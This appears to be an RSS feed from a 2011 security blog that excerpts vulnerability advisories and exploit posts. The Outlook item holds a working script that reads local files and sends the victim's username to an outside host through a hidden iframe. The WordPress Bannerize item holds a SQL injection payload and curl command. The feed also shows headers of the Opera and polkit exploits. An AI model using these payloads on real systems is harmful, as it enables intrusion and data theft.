<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; The Security World</title>
	<atom:link href="http://www.goitworld.com/category/the-security-world/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Outlook vulnerability explain</title>
		<link>http://www.goitworld.com/outlook-vulnerability-explain/</link>
		<comments>http://www.goitworld.com/outlook-vulnerability-explain/#comments</comments>
		<pubDate>Wed, 09 Nov 2011 13:10:35 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[outlook]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/outlook-vulnerability-explain/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>Send attenment demo.htm </p>
<p>Code:</p>
<blockquote><li>
<pre>&#60;script&#62;</pre>
</li>
<li>
<pre>xmlhttp=new ActiveXObject(&#34;Msxml2.XMLHTTP.3.0&#34;);</pre>
</li>
<li>
<pre>xmlhttp.open(&#34;GET&#34;,&#34;../../../../../../../../../../../../../../boot.ini&#34;,false);</pre>
</li>
<li>
<pre>xmlhttp.send();</pre>
</li>
<li>
<pre>alert(xmlhttp.responseText);</pre>
</li>
<li>
<pre>&#60;/script&#62;</pre>
</li>
<p>&#160;</p>
</blockquote>
<p>Information:</p>
<blockquote>
<p>&#60;script&#62;alert(document.URL)&#60;/script&#62;</p>
</blockquote>
<p>Get dir info</p>
<blockquote>
<p>C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx</p>
</blockquote>
<p>Demo:</p>
<blockquote>
<li>
<pre>&#60;script&#62;</pre>
</li>
<li>
<pre>var path = document.URL;</pre>
</li>
<li>
<pre>var regx = /Settings\\(.*)\\Local/ var rs= regx.exec(path); username=rs[1];</pre>
</li>
<li>
<pre>iframe_dom(&#34;http://www.80vul.com/hackgame/xs-g0.php?username=&#34;+username);</pre>
</li>
<li>
<pre>&#160;</pre>
</li>
<li>
<pre>function iframe_dom(script_filename) {</pre>
</li>
<li>
<pre>    var d = window.document;</pre>
</li>
<li>
<pre>    var newIframe = d.createElement('iframe');</pre>
</li>
<li>
<pre>    newIframe.src=script_filename;</pre>
</li>
<li>
<pre>    newIframe.style.width = 0;</pre>
</li>
<li>
<pre>    newIframe.style.height = 0;</pre>
</li>
<li>
<pre>    d.appendChild(newIframe);</pre>
</li>
<li>
<pre>    return false;</pre>
</li>
<li>
<pre>} &#60;/script&#62;</pre>
</li>
</blockquote>
<p></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/outlook-vulnerability-explain/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Opera 10/11 (bad nesting with frameset tag) Memory Corruption</title>
		<link>http://www.goitworld.com/opera-1011-bad-nesting-with-frameset-tag-memory-corruption/</link>
		<comments>http://www.goitworld.com/opera-1011-bad-nesting-with-frameset-tag-memory-corruption/#comments</comments>
		<pubDate>Fri, 07 Oct 2011 12:56:46 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[bad nesting with frameset tag]]></category>
		<category><![CDATA[memory corruption]]></category>
		<category><![CDATA[opera]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/opera-1011-bad-nesting-with-frameset-tag-memory-corruption/</guid>
		<description><![CDATA[<blockquote><p>################################################################### Exploit for Opera 10/11 (bad nesting with frameset tag) Memory Corruption     <br />#      <br /># Vulnerability:      <br />#      <br /># Discovered: 2010-08-18      <br /># Patched: 2011-05-18      <br /># Tested on: v10.xx (v10.00, v10.01, v10.10, v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)      <br />#&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; v11.xx &#60; v11.11 (v11.00, v11.01 and v11.10)      <br /># Patched on: v11.11      <br />#      <br /># Exploit:      <br />#      <br /># Coded: 2010-09-23      <br /># Last revision: 2011-09-30      <br />#      <br /># RCE on: v10.00, v10.50, v10.51, v10.52, v10.54, v10.60, v10.62, v11.00, v11.01 and v11.10*      <br /># DoS on: v10.01, v10.10, v10.53, v10.61</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/opera-1011-bad-nesting-with-frameset-tag-memory-corruption/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/opera-1011-bad-nesting-with-frameset-tag-memory-corruption/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>linux local privilege escalation on polkit-1 &lt;= 0.101</title>
		<link>http://www.goitworld.com/linux-local-privilege-escalation-on-polkit-1-0-101/</link>
		<comments>http://www.goitworld.com/linux-local-privilege-escalation-on-polkit-1-0-101/#comments</comments>
		<pubDate>Thu, 06 Oct 2011 14:17:44 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[Escalation]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[local privilege]]></category>
		<category><![CDATA[on polkit-1]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/linux-local-privilege-escalation-on-polkit-1-0-101/</guid>
		<description><![CDATA[<blockquote><p>/* polkit-pwnage.c     <br /> *      <br /> *      <br /> * ==============================      <br /> * =&#160;&#160;&#160;&#160;&#160; PolicyKit Pwnage&#160;&#160;&#160;&#160;&#160; =      <br /> * =&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; by zx2c4&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; =      <br /> * =&#160;&#160;&#160;&#160;&#160;&#160;&#160; Sept 2, 2011&#160;&#160;&#160;&#160;&#160;&#160;&#160; =      <br /> * ==============================      <br /> *      <br /> *      <br /> * Howdy folks,      <br /> *      <br /> * This exploits CVE-2011-1485, a race condition in PolicyKit.      <br /> *      <br /> * davidz25 explains:      <br /> *      <br /> * &#8211;begin&#8211;      <br /> * Briefly, the problem is that the UID for the parent process of pkexec(1) is      <br /> * read from</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/linux-local-privilege-escalation-on-polkit-1-0-101/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/linux-local-privilege-escalation-on-polkit-1-0-101/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco IOS Software IPv6 Denial of Service Vulnerability</title>
		<link>http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/</link>
		<comments>http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/#comments</comments>
		<pubDate>Tue, 04 Oct 2011 12:43:07 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[cisco]]></category>
		<category><![CDATA[denial of service]]></category>
		<category><![CDATA[ios]]></category>
		<category><![CDATA[ipv6]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/</guid>
		<description><![CDATA[<h5>Advisory ID: cisco-sa-20110928-ipv6</h5>
<h6><a href="http://www.cisco.com/en/US/products/products_security_advisory09186a0080b95d59.shtml">http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6.shtml</a></h6>
<h4>Revision 1.1</h4>
<h5>Last Updated 2011 September 30 2330 UTC (GMT)</h5>
<h5>For Public Release 2011 September 28 1600 UTC (GMT) </h5>
<hr />
<h4>Contents</h4>
<blockquote><p><b><a href="http://www.cisco.com/en/US/products/#summary">Summary</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#affected">Affected Products</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#details">Details</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#vulnerability">Vulnerability Scoring Details</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#impact">Impact</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#software">Software Versions and Fixes</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#workarounds">Workarounds</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#fixes">Obtaining Fixed Software</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#exploitation">Exploitation and Public Announcements</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#status">Status of this Notice: FINAL</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#distribution">Distribution</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#revision">Revision History</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#secpro">Cisco Security Procedures</a></b></p></blockquote>
<hr />
<h4><a name="summary">Summary</a></h4>
<p>Cisco IOS Software contains a vulnerability in the IP version 6 (IPv6) protocol stack implementation that could allow an unauthenticated, remote attacker to cause a reload of&#8230; <a href="http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Joomla 1.7.0  is vulnerable to multiple Cross Site Scripting issues</title>
		<link>http://www.goitworld.com/joomla-1-7-0-is-vulnerable-to-multiple-cross-site-scripting-issues/</link>
		<comments>http://www.goitworld.com/joomla-1-7-0-is-vulnerable-to-multiple-cross-site-scripting-issues/#comments</comments>
		<pubDate>Mon, 03 Oct 2011 13:07:32 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[cross site scripting]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[vulnerable]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/joomla-1-7-0-is-vulnerable-to-multiple-cross-site-scripting-issues/</guid>
		<description><![CDATA[<p>1. OVERVIEW</p>
<p>Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site   <br />Scripting issues.</p>
<p>2. BACKGROUND</p>
<p>Joomla is a free and open source content management system (CMS) for   <br />publishing content on the World Wide Web and intranets. It comprises a    <br />model鈥搗iew鈥揷ontroller (MVC) Web application framework that can also be    <br />used independently.    <br />Joomla is written in PHP, uses object-oriented programming (OOP)    <br />techniques and software design patterns, stores data in a MySQL    <br />database, and includes features such as page caching, RSS feeds,    <br />printable versions of pages, news flashes, blogs, polls, search, and    <br />support&#8230; <a href="http://www.goitworld.com/joomla-1-7-0-is-vulnerable-to-multiple-cross-site-scripting-issues/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/joomla-1-7-0-is-vulnerable-to-multiple-cross-site-scripting-issues/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress WP Bannerize plugin &lt;= 2.8.7 SQL Injection Vulnerability</title>
		<link>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/</link>
		<comments>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/#comments</comments>
		<pubDate>Sun, 02 Oct 2011 11:11:40 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wp bannerize plugin]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/</guid>
		<description><![CDATA[<blockquote><p># Exploit Title: WordPress WP Bannerize plugin &#60;= 2.8.7 SQL Injection Vulnerability     <br /># Date: 2011-09-22      <br /># Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)      <br /># Software Link: <a href="http://downloads.wordpress.org/plugin/wp-bannerize.zip">http://downloads.wordpress.org/plugin/wp-bannerize.zip</a>      <br /># Version: 2.8.7 (tested)      <br />&#160; <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />PoC (POST data)      <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br /><a href="http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php">http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php</a>      <br /> limit=1&#38;offset=1&#38;item[]=-1 AND 1=IF(2&#62;1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)      <br />&#160; <br />e.g.      <br />curl &#8211;data &#34;limit=1&#38;offset=1&#38;item[]=-1 AND 1=IF(2&#62;1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&#34; -H &#34;X-Requested-With:XMLHttpRequest&#34; <a href="http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php">http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php</a>      <br />&#160; <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />Vulnerable code      <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {      <br />&#160;&#160;&#160; &#8230;      <br />&#160;&#160;&#160; $limit = intval($_POST['limit']);      <br />&#160;&#160;&#160; $page_offset = (intval($_POST['offset']) &#8211; 1) * $limit;      <br />&#160; <br</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Excel Record Integer Signedness Vulnerability</title>
		<link>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/</link>
		<comments>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/#comments</comments>
		<pubDate>Fri, 16 Sep 2011 05:44:50 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[execl]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[record integer signedness]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/</guid>
		<description><![CDATA[<h6>I. BACKGROUND</h6>
<p>Excel is the spreadsheet application included with Microsoft Corp.&#8217;s Office productivity software suite. More information is available at the following website: </p>
<p><a href="http://office.microsoft.com/excel/">http://office.microsoft.com/excel/</a></p>
<h6>II. DESCRIPTION</h6>
<p>Remote exploitation of an integer signedness vulnerability in Microsoft Corp.&#8217;s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. </p>
<p>The vulnerability is an integer signedness issue that leads to an invalid array indexing vulnerability. It is triggered by a certain record with a negative &#8216;iax&#8217; field. </p>
<p>It is possible to pass negative 16-bit values, which are later sign extended to 32 bits. The sign&#8230; <a href="http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>cPanel &lt; 11.30.2 Multiple CSRF Vulnerabilities</title>
		<link>http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/</link>
		<comments>http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/#comments</comments>
		<pubDate>Wed, 14 Sep 2011 07:20:52 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[cpanel]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/</guid>
		<description><![CDATA[<p>Test Code:</p>
<blockquote><p>[+] Info=======================================================</p>
<p>[-] Exploit Title: cPanel &#60; 11.30.2 Multiple CSRF Vulnerabilities      <br />[-] Author: Net.Edit0r       <br />[-] Home : Black-HG.Org ~ h4ckcity.org       <br />[-] Version: 11.30.2       <br />[-] Software Link: <a href="http://cpanel.net">http://cpanel.net</a>       <br />[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net       <br />[-] Date : 27/08/2011       <br />[-] CVE : N/A       <br />[-] Vedio Demo : <a href="http://www.black-hg.org/Vedioz/cpanel.rar">http://www.black-hg.org/Vedioz/cpanel.rar</a>       <br />[-] Tnx2 : A.Cr0x &#38; 3H34N &#38; 4m!n &#38; Cyrus &#38; tHe.k!ll3r &#38; Mr.XHat &#38; Mikili</p>
<p>[+] Exploit=====================================================</p>
<p>[-]&#160; Introduction :</p>
<p>cPanel versions below and excluding 11.30.2 , are vulnerable to CSRF which      <br />leads to Change email address script of</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mongodb Safety Study</title>
		<link>http://www.goitworld.com/mongodb-safety-study/</link>
		<comments>http://www.goitworld.com/mongodb-safety-study/#comments</comments>
		<pubDate>Sat, 03 Sep 2011 07:56:34 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[mongodb]]></category>
		<category><![CDATA[safety study]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/mongodb-safety-study/</guid>
		<description><![CDATA[<p>Mongodb, so long to fire the thing actually had a good look.&#160; Carefully until no time learn new things, always feel lack of energy.&#160; The advantage of buying a book on fragmented in the VPS on the build, test, to see the implementation code.&#160; Feeling quite interesting a database. Although the feeling it is very simple, especially when it is looking at the code feel so.&#160; But this is not what is another example of KISS, or something simple but useful most popular. </p>
<p>Since they saw their implementation, can not fail to output something.&#160; Just did not update the&#8230; <a href="http://www.goitworld.com/mongodb-safety-study/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/mongodb-safety-study/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Apache Tomcat Authentication bypass and information disclosure</title>
		<link>http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/</link>
		<comments>http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/#comments</comments>
		<pubDate>Fri, 02 Sep 2011 15:03:23 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[disclosure]]></category>
		<category><![CDATA[tomcat]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/</guid>
		<description><![CDATA[<p>Severity: Important</p>
<p>Vendor: The Apache Software Foundation</p>
<p>Versions Affected:   <br />- Tomcat 7.0.0 to 7.0.20    <br />- Tomcat 6.0.0 to 6.0.33    <br />- Tomcat 5.5.0 to 5.5.33    <br />- Earlier, unsupported versions may also be affected</p>
<p>Description:   <br />Apache Tomcat supports the AJP protocol which is used with reverse    <br />proxies to pass requests and associated data about the request from the    <br />reverse proxy to Tomcat. The AJP protocol is designed so that when a    <br />request includes a request body, an unsolicited AJP message is sent to    <br />Tomcat that includes the first part (or possibly all) of&#8230; <a href="http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

